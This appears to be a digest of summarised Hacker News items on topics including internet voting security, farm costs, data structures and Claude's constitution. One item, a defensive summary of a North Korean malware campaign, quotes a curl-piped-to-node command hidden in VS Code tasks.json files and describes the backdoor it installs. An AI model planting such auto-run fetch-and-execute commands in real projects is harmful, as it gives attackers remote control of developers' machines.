HackerNews Digest

Internet voting remains insecure and cannot be made safe with existing technology. All such systems suffer three core vulnerabilities: (1) voter‑device malware can alter selections; (2) server‑side malware or insider attacks can modify ballots; (3) county‑office systems that process internet ballots are equally vulnerable to hacking. Unlike paper ballots, a single global attacker can affect large numbers of votes undetected. End‑to‑end verifiable internet voting (E2E‑VIV) adds further weaknesses: verification apps may be compromised, receipt‑free designs are complex and rarely used, and there is no reliable dispute‑resolution mechanism for voters who detect fraud. The recently announced “VoteSecure” SDK, promoted by Bradley Tusk’s Mobile Voting Foundation, exhibits the same security gaps; developers acknowledge the flaws and lack a viable remedy. The scientific consensus, reflected in decades of peer‑reviewed research, holds that no known or foreseeable technology can secure internet voting for public elections. Consequently, election officials should treat press releases about internet voting with caution and rely on established, peer‑reviewed security analyses.

GitHub repository freedomofpress/dangerzone is a tool designed to mitigate security risks in file handling by converting potentially malicious PDFs, Office documents, and image files into safe, sanitized PDFs. The project’s interface includes settings and conversion functions, as indicated by associated UI screenshots. The repository lists contributions from multiple users (e.g., @apyrgio, @micahflee, @deeplow, @almet, @jkarasti, @dependabot[bot], @gmarmstrong, @naglis, @OctopusET, @garrettr, @EtiennePerot, @keywordnew, @rocodes, @sudwhiwdh). Access to the repository’s main content is currently restricted, shown by the message “You can’t perform that action at this time.” No additional documentation or code details are present in the provided text.

The USDA Economic Research Service’s December update projects per‑acre production costs for all nine principal row crops to rise again in 2026, extending a cost‑increase trend that began after 2021. 2025 total costs range from $396/acre for wheat to $1,336/acre for rice; 2026 increases of 2.2‑3.3% are expected, keeping wheat, sorghum and oats at the low end and cotton, peanuts and rice at the high end. Operating expenses—seed, fertilizer, chemicals, fuel, labor, interest, maintenance—remain well above pre‑2021 levels, with notable hikes in interest (+71%), fertilizer (+37%), fuel (+32%), labor (+47%) and chemicals (+25%). Commodity prices are insufficient to cover these costs, so farms are projected to post losses for a fourth‑fifth consecutive year even after crop‑insurance indemnities and federal assistance (Farmer Bridge Assistance and Emergency Commodity Assistance Program). Net sector losses exceed $50 billion over the past three crop years; per‑acre losses range from $42 (barley) to $210 (rice). Specialty‑crop programs provide limited relief, leaving many growers with persistent negative margins and strained cash flow. Proposed safety‑net enhancements (OBBBA) will not take effect until late 2026, so short‑term financial pressures remain.

Binary Fuse Filters are presented as a new class of probabilistic set‑membership data structures that achieve both faster query times and reduced memory usage compared to existing xor filters. The work focuses on designing the filter’s internal representation and construction algorithms to improve performance while maintaining comparable false‑positive rates. Empirical results demonstrate that binary fuse filters consistently outperform xor filters in speed and occupy less space, making them advantageous for high‑throughput applications requiring compact approximate membership testing.

ChartGPU is an open‑source charting library built on WebGPU, enabling high‑performance, GPU‑accelerated visualizations for web applications. The project is hosted on GitHub and distributed via npm, providing developers with a ready‑to‑install package. It includes a live demo showcasing various chart types, such as candlestick charts, demonstrating the library’s rendering capabilities. The repository lists its licensing information, allowing unrestricted use under the specified terms. Overall, ChartGPU offers a modern, GPU‑based solution for creating interactive, aesthetically pleasing charts directly in the browser.

Claude’s new constitution is a publicly released, CC0‑licensed document that outlines Anthropic’s intended values and behavior for the Claude model. It serves as the primary authority guiding training, synthetic data generation, and future model updates, and it is meant to be read by Claude itself to inform its actions. The constitution prioritizes four core properties—broad safety (preserving human oversight), broad ethics (honesty, avoidance of harm), compliance with Anthropic’s specific guidelines, and genuine helpfulness—listed in order of precedence for conflict resolution. Its structure includes sections on helpfulness, Anthropic’s supplemental guidelines, Claude’s ethics (including hard constraints such as prohibitions on bioweapon assistance), safety over ethics to maintain controllability, and reflections on Claude’s nature, identity, and psychological security. The document emphasizes explanatory, principle‑based guidance over rigid rules, aiming to enable generalization to novel situations while retaining “hard constraints” for high‑risk actions. Anthropic commits to ongoing transparency, external expert feedback, and continuous refinement as model capabilities evolve.

The campaign, linked to a North‑Korean threat actor, leverages Microsoft Visual Studio Code tasks.json files to execute malicious code when a victim opens a cloned GitHub or GitLab repository in VS Code. Granting repository trust triggers a background command on macOS that runs `nohup bash -c "curl -s | node"` to fetch an obfuscated JavaScript payload hosted on vercel.app. The payload (SHA‑256 932a678…) contains largely dead code but implements a persistent backdoor that: - Beacons every 5 seconds to a C2 server, sending hostname, MAC addresses, OS details and public IP (via ipify.org). - Executes arbitrary JavaScript supplied by the C2, allowing dynamic import of Node.js modules and full remote code execution. - Can spawn child processes, terminate itself, and clean up on attacker command. Subsequent payloads reuse the same C2 infrastructure and show AI‑generated code comments. The abuse demonstrates adaptation of developer tools for macOS malware delivery. Mitigations include enabling Jamf Threat Prevention/Advanced Threat Controls in block mode and vetting third‑party repositories and npm install scripts before trusting them.

Skip is a cross‑platform development framework that lets developers build native iOS and Android apps from a single Swift / SwiftUI codebase. Since its 2023 launch, Skip progressed from a Swift‑to‑Kotlin transpiler to a native Swift Android SDK and a comprehensive SwiftUI implementation supporting many integration frameworks and Swift packages. Up to version 1.7 the tool required a paid subscription and license keys for business use; free usage was limited to indie developers below a revenue threshold. As of Skip 1.7, all licensing is removed: no keys, EULAs, or trial periods. The core engine, “skipstone,” is now open‑source on GitHub under a free license, handling project creation, Xcode/SwiftPM plugins, iOS‑to‑Android transformation, resource bundling, JNI bridge generation, transpilation, packaging, and export. Documentation and the site have moved to skip.dev, also open‑source. Existing paid plans convert to Individual or Supporter tiers, and the project seeks community funding via GitHub Sponsors and corporate sponsorships to sustain development. Skip remains bootstrapped, independent of venture funding, and positions itself as a no‑compromise alternative to legacy cross‑platform tools.

None

None